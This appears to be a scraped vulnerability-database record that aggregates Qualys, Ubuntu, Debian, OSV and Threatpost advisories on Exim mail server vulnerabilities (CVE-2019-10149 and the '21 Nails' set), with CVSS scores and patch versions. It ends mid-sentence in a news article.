impacted hosts against threats.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/05/Screen-Shot-2020-05-29-at-3.55.42-PM.png)\n\n### Remediation\n\nCustomers are advised to update Exim immediately by installing version 4.92 or newer to remediate this vulnerability. System admins can update respective linux distros using package manager or by downloading the latest version from <https://www.exim.org/mirrors.html>\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get the [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>).", "cvss3": {}, "published": "2020-05-29T22:42:14", "type": "qualysblog", "title": "NSA Announces Sandworm Actors Exploiting Exim MTA Vulnerability (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-29T22:42:14", "id": "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-07-23T09:35:32", "description": "## Releases\n\n * Ubuntu 21.04 \n * Ubuntu 20.10 \n * Ubuntu 20.04 LTS\n * Ubuntu 18.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim contained multiple security issues. An attacker \ncould use these issues to cause a denial of service, execute arbitrary \ncode remotely, obtain sensitive information, or escalate local privileges.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntu", "title": "Exim vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-04T00:00:00", "id": "USN-4934-1", "href": "https://ubuntu.com/security/notices/USN-4934-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:36:55", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nUSN-4934-1 fixed several vulnerabilities in Exim. This update provides \nthe corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. \nCVE-2020-28026 only affected Ubuntu 16.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that Exim contained multiple security issues. An attacker \ncould use these issues to cause a denial of service, execute arbitrary \ncode remotely, obtain sensitive information, or escalate local privileges.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T00:00:00", "type": "ubuntu", "title": "Exim vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28020", "CVE-2020-28022", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-06T00:00:00", "id": "USN-4934-2", "href": "https://ubuntu.com/security/notices/USN-4934-2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-25T00:20:12", "description": "## Releases\n\n * Ubuntu 18.10 \n * Ubuntu 18.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim incorrectly handled certain decoding \noperations. A remote attacker could possibly use this issue to execute \narbitrary commands.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T00:00:00", "type": "ubuntu", "title": "Exim vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T00:00:00", "id": "USN-4010-1", "href": "https://ubuntu.com/security/notices/USN-4010-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:15:27", "description": "\nThe Qualys Research Labs reported several vulnerabilities in Exim, a mail\ntransport agent, which could result in local privilege escalation and\nremote code execution.\n\n\nDetails can be found in the Qualys advisory at\n<https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.89-2+deb9u8.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at: <https://security-tracker.debian.org/tracker/exim4>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019", "CVE-2020-28026", "CVE-2020-28023", "CVE-2020-28017", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28013", "CVE-2020-28009", "CVE-2020-28020", "CVE-2020-28015", "CVE-2020-28025", "CVE-2020-28012", "CVE-2020-28014", "CVE-2020-28022", "CVE-2020-28011", "CVE-2020-28024", "CVE-2020-28021"], "modified": "2022-07-21T05:53:43", "id": "OSV:DLA-2650-1", "href": "https://osv.dev/vulnerability/DLA-2650-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:07:11", "description": "\nThe Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\n\nDetails can be found in the Qualys advisory at\n<https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.92-8+deb10u6.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/exim4>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019", "CVE-2020-28026", "CVE-2020-28023", "CVE-2020-28017", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28013", "CVE-2020-28009", "CVE-2020-28015", "CVE-2020-28025", "CVE-2020-28010", "CVE-2020-28012", "CVE-2020-28014", "CVE-2020-28022", "CVE-2020-28011", "CVE-2020-28024", "CVE-2020-28021"], "modified": "2022-08-10T07:07:07", "id": "OSV:DSA-4912-1", "href": "https://osv.dev/vulnerability/DSA-4912-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:14:34", "description": "\nThe Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver\\_message() function may result in the execution of arbitrary\ncommands.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/exim4>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-08-10T07:14:30", "id": "OSV:DSA-4456-1", "href": "https://osv.dev/vulnerability/DSA-4456-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-21T18:16:23", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4912-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 04, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2020-28007 CVE-2020-28008 CVE-2020-28009 CVE-2020-28010\n CVE-2020-28011 CVE-2020-28012 CVE-2020-28013 CVE-2020-28014\n CVE-2020-28015 CVE-2020-28017 CVE-2020-28019 CVE-2020-28021\n CVE-2020-28022 CVE-2020-28023 CVE-2020-28024 CVE-2020-28025\n CVE-2020-28026\n\nThe Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\nDetails can be found in the Qualys advisory at\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.92-8+deb10u6.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-04T13:53:56", "type": "debian", "title": "[SECURITY] [DSA 4912-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-04T13:53:56", "id": "DEBIAN:DSA-4912-1:A1054", "href": "https://lists.debian.org/debian-security-announce/2021/msg00093.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-03T03:12:38", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2650-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Thorsten Alteholz\nMay 05, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : exim4\nVersion : 4.89-2+deb9u8\nCVE ID : CVE-2020-28007 CVE-2020-28008 CVE-2020-28009\n CVE-2020-28011 CVE-2020-28012 CVE-2020-28013\n CVE-2020-28014 CVE-2020-28015 CVE-2020-28017\n CVE-2020-28019 CVE-2020-28020 CVE-2020-28021\n CVE-2020-28022 CVE-2020-28023 CVE-2020-28024\n CVE-2020-28025 CVE-2020-28026\n\n\nThe Qualys Research Labs reported several vulnerabilities in Exim, a mail \ntransport agent, which could result in local privilege escalation and \nremote code execution.\n\n\nDetails can be found in the Qualys advisory at \nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\n\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.89-2+deb9u8.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security \ntracker page at: https://security-tracker.debian.org/tracker/exim4\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T10:38:28", "type": "debian", "title": "[SECURITY] [DLA 2650-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-05T10:38:28", "id": "DEBIAN:DLA-2650-1:EE0B1", "href": "https://lists.debian.org/debian-lts-announce/2021/05/msg00004.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T14:35:00", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4912-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 04, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2020-28007 CVE-2020-28008 CVE-2020-28009 CVE-2020-28010\n CVE-2020-28011 CVE-2020-28012 CVE-2020-28013 CVE-2020-28014\n CVE-2020-28015 CVE-2020-28017 CVE-2020-28019 CVE-2020-28021\n CVE-2020-28022 CVE-2020-28023 CVE-2020-28024 CVE-2020-28025\n CVE-2020-28026\n\nThe Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\nDetails can be found in the Qualys advisory at\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.92-8+deb10u6.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T13:53:56", "type": "debian", "title": "[SECURITY] [DSA 4912-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-04T13:53:56", "id": "DEBIAN:DSA-4912-1:AC8C7", "href": "https://lists.debian.org/debian-security-announce/2021/msg00093.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-28T09:25:25", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4456-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 05, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2019-10149\n\nThe Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T15:35:03", "type": "debian", "title": "[SECURITY] [DSA 4456-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T15:35:03", "id": "DEBIAN:DSA-4456-1:D32A2", "href": "https://lists.debian.org/debian-security-announce/2019/msg00101.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-04T15:20:47", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4456-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 05, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2019-10149\n\nThe Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T15:35:03", "type": "debian", "title": "[SECURITY] [DSA 4456-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T15:35:03", "id": "DEBIAN:DSA-4456-1:5D64B", "href": "https://lists.debian.org/debian-security-announce/2019/msg00101.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-05-06T18:52:05", "description": "A veritable cornucopia of security vulnerabilities in the Exim mail server have been uncovered, some of which could be chained together for unauthenticated remote code execution (RCE), gaining root privileges and worm-style lateral movement, according to researchers.\n\nThe Qualys Research Team has discovered a whopping 21 bugs in the popular mail transfer agent (MTA), which was built to send and receive email on major Unix-like operating systems. It comes pre-installed on Linux distributions such as Debian, for instance.\n\n[![zoho webinar promo](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29074106/Zoho_Webinar_Promo.png)](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\n\u201cMTAs are interesting targets for attackers because they are usually accessible over the internet,\u201d according to the Qualys analysis, [issued on Tuesday](<https://www.qualys.com/2021/05/04/21nails/21nails.txt>). \u201cOnce exploited, they could modify sensitive email settings on the mail servers, allow adversaries to create new accounts on the target mail servers,\u201d Qualys Senior Manager of Vulnerabilities Bharat Jogi said in a [post](<https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server>).\n\nResearchers said that according to a [Shodan search](<https://www.shodan.io/>), nearly 4 million Exim servers are directly exposed to the internet.\n\nOut of the 21 vulns, which Qualys collectively dubbed \u201c21 Nails,\u201d 10 of them can be exploited remotely. And, most of them can be exploited in either default configuration or \u201cin a very common configuration,\u201d according to Qualys. Also, most of them affect all versions of Exim going back to its inception in 2004.\n\n\u201cExim Mail Servers are used so widely and handle such a large volume of the internet\u2019s traffic that they are often a key target for hackers,\u201d Jogi said, noting that last year, a vulnerability in Exim [was a target of](<https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/>) the Russian advanced persistent threat (APT) known as Sandworm.\n\nHe added, \u201cThe 21 vulnerabilities we found are critical as attackers can remotely exploit them to gain complete root privileges on an Exim system \u2013 allowing compromises such as a remote attacker gaining full root privileges on the target server and executing commands to install programs, modify data, create new accounts and change sensitive settings on the mail servers. It\u2019s imperative that users apply patches immediately.\u201d\n\n## **Exim Patching Status**\n\nQualys researchers wrote and tested [the 